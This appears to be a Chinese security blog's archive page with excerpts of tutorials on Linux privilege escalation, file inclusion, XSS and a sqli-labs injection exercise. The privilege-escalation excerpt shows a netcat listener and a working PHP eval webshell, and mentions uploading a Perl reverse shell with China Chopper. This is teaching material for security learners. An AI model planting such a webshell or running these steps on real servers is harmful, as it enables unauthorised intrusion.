04 2022 档案
摘要:Linux内核提权 一般情况下,web网站都是普通权限,如果想获取root权限,这个时候就得需要提权 使用nc监听端口 nc -l 1234 上传一句话木马 <?php @eval($_POST[nb]); ?> 使用中国菜刀连接服务器 使用中国菜刀上传:perl-reverse-shell.pl
阅读全文
摘要:文件包含漏洞 什么是文件包含漏洞 文件包含:指的是脚本语言程序支持文件包含函数,开发者为了避免再次编写代码,将这些代码插入到指定的地方,在需要的时候直接调用该文件,这种操作就称之为文件包含。如果我们对这些文件具有读取权限的话,就会导致了文件包含漏洞。 php常见的高危文件包含函数 include()
阅读全文
摘要:XSS漏洞 XSS攻击全称为跨站脚本攻击,允许恶意用户将将代码植入到web网站里,供其他用户访问,当其他用户访问到恶意代码的网友就会产生xss攻击 危害 盗取用户账号,比如普通用户账号、管理员账号、银行用户账号等 控制企业数据,包括读取、篡改、添加、删除企业数据,盗取企业核心数据 非法转账 强制发送
阅读全文
摘要:Less-23 基于错误去除注释 目标 1. 学会使用;%00注入绕过 ;%00: 分号之前的语句会被执行,%00是空格,可以绕过检测 输入:http://www.sqllabs.com:7080/Less-23/?id=1' 发现报错 在使用 # 或者 --+ 进行注入的时候,发现还是报错,分析源
阅读全文
